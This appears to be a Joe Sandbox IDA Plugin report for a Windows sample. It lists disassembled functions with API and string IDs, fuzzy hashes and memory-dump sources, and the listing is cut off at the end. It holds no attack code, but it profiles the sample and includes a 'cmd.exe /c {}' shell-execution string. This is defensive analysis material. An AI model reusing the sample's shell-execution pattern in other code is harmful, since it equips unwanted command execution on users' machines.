                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Handle$File$ErrorInformationLast$Close__std_fs_open_handle$CreateFeaturePresentProcessor
                          • String ID:
                          • API String ID: 2221425841-0
                          • Opcode ID: be13dedac457fed96a1976cc7ff97a3659dff4da51673047d79026a1ca7cdedc
                          • Instruction ID: 56e2c22107d4ea747527557cb45aaf8811d2cf74770d9fe0c5cb3e74f0aaa043
                          • Opcode Fuzzy Hash: be13dedac457fed96a1976cc7ff97a3659dff4da51673047d79026a1ca7cdedc
                          • Instruction Fuzzy Hash: 7E515021F0C692C9F720BBF698541FD6BE1BB457A8F180235CE2ED6AD5DF2AE4458700
                          Function 00007FF646E443D0 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 368COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$ApisFile__std_exception_copy__std_exception_destroy__std_fs_code_page
                          • String ID: ", "$: "
                          • API String ID: 4080386414-747220369
                          • Opcode ID: 05c3dfbba4eb20530540709d86ff3074b5dc9a95fb648d62f5b8df6b1e23a1b9
                          • Instruction ID: 7a5ca4b24493dc15c985c6465d94af922349250ecf5143f2bcdae2e5000669d2
                          • Opcode Fuzzy Hash: 05c3dfbba4eb20530540709d86ff3074b5dc9a95fb648d62f5b8df6b1e23a1b9
                          • Instruction Fuzzy Hash: 93E18C72B1DB8185EB00FF69D1443ADA3A1FB44BC8F508032DA4D57A9ADFBAD495C380
                          Function 00007FF646E50CA0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 139COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big
                          • API String ID: 909987262-180087107
                          • Opcode ID: 4c3e943ee338831783309dd563fbb4d97c46b2b84faac3d06deaee2935f2af1c
                          • Instruction ID: 8709228f60fae0bd2da0ea2ded7857c9a50472b1cd7d3833e2f43ff7d8d285cb
                          • Opcode Fuzzy Hash: 4c3e943ee338831783309dd563fbb4d97c46b2b84faac3d06deaee2935f2af1c
                          • Instruction Fuzzy Hash: 52518222A0C55682DF25BF58E0512BDB3E0FF50B84FA44132EB5D866D5EF2EE585C740
                          Function 00007FF646E5AA4C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 21libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                          • API String ID: 667068680-1247241052
                          • Opcode ID: 22a4611cc918a9d534043bcd573fae71c2f1a40576616ef3d12a778fa7794f91
                          • Instruction ID: 666aef6b016e319b07a6175284e7d358221e9b3ab10544f7bc45e4234d92fb44
                          • Opcode Fuzzy Hash: 22a4611cc918a9d534043bcd573fae71c2f1a40576616ef3d12a778fa7794f91
                          • Instruction Fuzzy Hash: C0F07464A1EB07D5EA14BBA1B8680A1A3E4BF48B5AB844035C90E86321FF7EA159C340
                          Function 00007FF646E5D820 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 092c79a0d9bcacff9565d77ad08bd040531453131bf8b4731f570bb9007e49b0
                          • Instruction ID: bf8102a9e68aa271963e9bfbf02ef1487b9236546ad44af0e0af63da456da2f5
                          • Opcode Fuzzy Hash: 092c79a0d9bcacff9565d77ad08bd040531453131bf8b4731f570bb9007e49b0
                          • Instruction Fuzzy Hash: A1D17F72A0C74186EB60FBA5D4503ADB7E0FB55B98F10013AEA8D97B99DF39E090C744
                          Function 00007FF646E554B0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 177COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                          • String ID: bad locale name$false$true
                          • API String ID: 3230409043-1062449267
                          • Opcode ID: 9fabb503fc1107b3eab03e6cd44713a08fb1cc94f3790c058f9689e501c1b5d4
                          • Instruction ID: 03477e2f49d08cd61218fdaf2a695aad273e71ff4108870a7c0b15f67429fc31
                          • Opcode Fuzzy Hash: 9fabb503fc1107b3eab03e6cd44713a08fb1cc94f3790c058f9689e501c1b5d4
                          • Instruction Fuzzy Hash: 6F814A22A1DB8185EB01EFA4E4802ADB7F0FF84784F541135EB8DA7A99DF39D590C750
                          Function 00007FF646E66460 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 490COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: f$p$p
                          • API String ID: 3215553584-1995029353
                          • Opcode ID: 1fa6fcf4c69cf2957793d2dab1b9a7211fd6f3d91b307342b650d52c4b68a3d1
                          • Instruction ID: 5080d26fb84d3655c633ec3e59087961c68a09f7cb4f354c2db09bcb46f83ba0
                          • Opcode Fuzzy Hash: 1fa6fcf4c69cf2957793d2dab1b9a7211fd6f3d91b307342b650d52c4b68a3d1
                          • Instruction Fuzzy Hash: 0B12A161F2C193C6FB207B14E058279E7E2FB81754FD4A135E789866D4DE3EE8908B12
                          Function 00007FF646E6A500 Relevance: 10.8, APIs: 7, Instructions: 293COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 7dbb31f6801050b09f23af542c6ce5680b1b033fa1b6e520660a9cb4d4b647be
                          • Instruction ID: 263835e7c161dbcd11adf52b81e194d95fba71007efe1148eb4d278944bb3b8d
                          • Opcode Fuzzy Hash: 7dbb31f6801050b09f23af542c6ce5680b1b033fa1b6e520660a9cb4d4b647be
                          • Instruction Fuzzy Hash: 15C1D222E0C78785E760BB1890442BDBBE1FF81B80F952131DB4E87796DE7EE8659740
                          Function 00007FF646E50B10 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 121COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Invalid fill (too long).$Invalid format string.$invalid fill character '{'
                          • API String ID: 909987262-2189586557
                          • Opcode ID: b5ef4e00f5ed7918e6555e22bdf8501b8cab8dfcd7f8afc20cc6f89b8efb41a0
                          • Instruction ID: 132dfa4a2888186fc84d76e2e65263889b578cf7ca034713187737c7d0d15550
                          • Opcode Fuzzy Hash: b5ef4e00f5ed7918e6555e22bdf8501b8cab8dfcd7f8afc20cc6f89b8efb41a0
                          • Instruction Fuzzy Hash: 2A41FB22F0C99682EA64BF99D4501B9E3D1FF51BC8F584032EB4C97799DE6EE5458300
                          Function 00007FF646E479F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109processsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Lockitstd::_$CloseHandleLockit::_Lockit::~_$CreateObjectProcessSingleWait_invalid_parameter_noinfo_noreturn
                          • String ID: cmd.exe /c {}
                          • API String ID: 2529529778-3162138867
                          • Opcode ID: 89795bf87a76dcca8fec0eae3f411fff3c49443297445b2a0407c85bee09c839
                          • Instruction ID: c1ec0590a11a587730ed6468783571f5bbba2511c59217f0ba8dfef563ddfabe
                          • Opcode Fuzzy Hash: 89795bf87a76dcca8fec0eae3f411fff3c49443297445b2a0407c85bee09c839
                          • Instruction Fuzzy Hash: 9C517272E1CB818AE710AF74E8403ADB3B1F798758F105225EE8C56A59EFB9D194C700
                          Function 00007FF646E6014C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF646E60353,?,?,00000000,00007FF646E5CE5A,?,?,?,00007FF646E5CA91), ref: 00007FF646E601D1
                          • GetLastError.KERNEL32(?,?,?,00007FF646E60353,?,?,00000000,00007FF646E5CE5A,?,?,?,00007FF646E5CA91), ref: 00007FF646E601DF
                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF646E60353,?,?,00000000,00007FF646E5CE5A,?,?,?,00007FF646E5CA91), ref: 00007FF646E60209
                          • FreeLibrary.KERNEL32(?,?,?,00007FF646E60353,?,?,00000000,00007FF646E5CE5A,?,?,?,00007FF646E5CA91), ref: 00007FF646E60277
                          • GetProcAddress.KERNEL32(?,?,?,00007FF646E60353,?,?,00000000,00007FF646E5CE5A,?,?,?,00007FF646E5CA91), ref: 00007FF646E60283
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          • API String ID: 2559590344-2084034818
                          • Opcode ID: a8f065913e62d8b40ec08f6ec93b373e41dc6187d27607b4b9745cbf9b314f32
                          • Instruction ID: f6256bc881c99704feec2ba28c6f84764b246b2660693b4d61e9acfed0171596
                          • Opcode Fuzzy Hash: a8f065913e62d8b40ec08f6ec93b373e41dc6187d27607b4b9745cbf9b314f32
                          • Instruction Fuzzy Hash: 37310421B1EB52D1EE22BB12A900275A3D4FF49BA4F891534DE1D8B392FF3EE4458700
                          Function 00007FF646E72CF8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                          • String ID: CONOUT$
                          • API String ID: 3230265001-3130406586
                          • Opcode ID: 89a71625859c9bbcda66b2291a7366cba158d72fa4787ad431cd94ad3bec0ea6
                          • Instruction ID: f310f14e9c16f5d22c33ba78c4e5aaa66c29d00aa1499703b70d8f786a7b358a
                          • Opcode Fuzzy Hash: 89a71625859c9bbcda66b2291a7366cba158d72fa4787ad431cd94ad3bec0ea6
                          • Instruction Fuzzy Hash: C1115E31B1CA4186E760BB52E844329A3E0FB88BE5F144334EA5EC77A5DF7DD4058B44
                          Function 00007FF646E5A750 Relevance: 9.2, APIs: 6, Instructions: 206COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ByteCharMultiStringWide
                          • String ID:
                          • API String ID: 2829165498-0
                          • Opcode ID: 2f010e8b8aea278891a9880bfc7065d316f81339279a43416f5160c67bd53451
                          • Instruction ID: ab67da59fcf78f379b684cd1eb3ba377cb592f6909e4bf031deb6dc5eb946a17
                          • Opcode Fuzzy Hash: 2f010e8b8aea278891a9880bfc7065d316f81339279a43416f5160c67bd53451
                          • Instruction Fuzzy Hash: FD81AC72A0D78286EB20BF69A544279B3E5FB44BE8F540231EA5D83BD9DF3ED4058700
                          Function 00007FF646E4B800 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                          • String ID:
                          • API String ID: 2081738530-0
                          • Opcode ID: 3a9136b57777e7af426870d4492c59b4fdea9b8c37fa80b5f5c531d690ce3055
                          • Instruction ID: 2ae57f67f45b66b3d1b54e0ae9963ed6ff0a2a980011c98a1e283a09d4cbca81
                          • Opcode Fuzzy Hash: 3a9136b57777e7af426870d4492c59b4fdea9b8c37fa80b5f5c531d690ce3055
                          • Instruction Fuzzy Hash: 6A313E22A0CA4285EA24BF25E8401B9B3F0FF98B98F581531DA9D877A5DE7EE441C700
                          Function 00007FF646E49BF0 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                          • String ID:
                          • API String ID: 2081738530-0
                          • Opcode ID: ccee4ecad965195149a33127be7459d68f658a740a62c8ff56008f5e199151f1
                          • Instruction ID: 4055c11fe29571029dd5f107048b767a3a7771246e7c01e5bb4b378b82037d3d
                          • Opcode Fuzzy Hash: ccee4ecad965195149a33127be7459d68f658a740a62c8ff56008f5e199151f1
                          • Instruction Fuzzy Hash: 66316122A0CA4285EB54FF25E4401B9B7F0FB98B94F181131EB4D9B3A5DE7EE441C700
                          Function 00007FF646E5DCF0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 3523768491-393685449
                          • Opcode ID: 0daa2566d35f1be2a9c28eb925f1bb7541095db64908311033f8d271ab9c7a6d
                          • Instruction ID: 53f6d48643733b40051f2e2d0038929a4501629925dfad8b131747d05ad521eb
                          • Opcode Fuzzy Hash: 0daa2566d35f1be2a9c28eb925f1bb7541095db64908311033f8d271ab9c7a6d
                          • Instruction Fuzzy Hash: 9FE1B47290C7828AE720FFA5D4802BDBBE0FB44B48F150136DA5D87696DF39E585CB41
                          Function 00007FF646E67260 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32 ref: 00007FF646E6726F
                          • SetLastError.KERNEL32 ref: 00007FF646E6728E
                          • FlsSetValue.KERNEL32 ref: 00007FF646E672B7
                          • FlsSetValue.KERNEL32 ref: 00007FF646E672C8
                          • FlsSetValue.KERNEL32 ref: 00007FF646E672D9
                            • Part of subcall function 00007FF646E68670: HeapFree.KERNEL32(?,?,00007FF646E65F93,00007FF646E6F34A,?,?,?,00007FF646E6F6C7,?,?,00000000,00007FF646E6FC41,?,?,?,00007FF646E6FB73), ref: 00007FF646E68686
                            • Part of subcall function 00007FF646E68670: GetLastError.KERNEL32(?,?,00007FF646E65F93,00007FF646E6F34A,?,?,?,00007FF646E6F6C7,?,?,00000000,00007FF646E6FC41,?,?,?,00007FF646E6FB73), ref: 00007FF646E68690
                          • SetLastError.KERNEL32 ref: 00007FF646E672FC
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ErrorLast$Value$FreeHeap
                          • String ID:
                          • API String ID: 365477584-0
                          • Opcode ID: fe2524d419249443a627d0978d975f38a3c012d14499332c4c9054e06e9d0a3a
                          • Instruction ID: 6c927ad051c3709939d19376721e388a2f22d7398c7e9706e5e2140c977a062f
                          • Opcode Fuzzy Hash: fe2524d419249443a627d0978d975f38a3c012d14499332c4c9054e06e9d0a3a
                          • Instruction Fuzzy Hash: AE115E20F1C65382FB547B31A81117EA6D2BF89790F946634EA1EC72D6DF2EEC428354
                          Function 00007FF646E41DD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                          • String ID: bad locale name
                          • API String ID: 2967684691-1405518554
                          • Opcode ID: 3c7442846abff8c8df307d68f8679435e50f571c47f0fd70ca014f12eac927a6
                          • Instruction ID: 4532dbb4eec0ea492c864db2a335e8aefa529421083dd451525c11365b3a1ac2
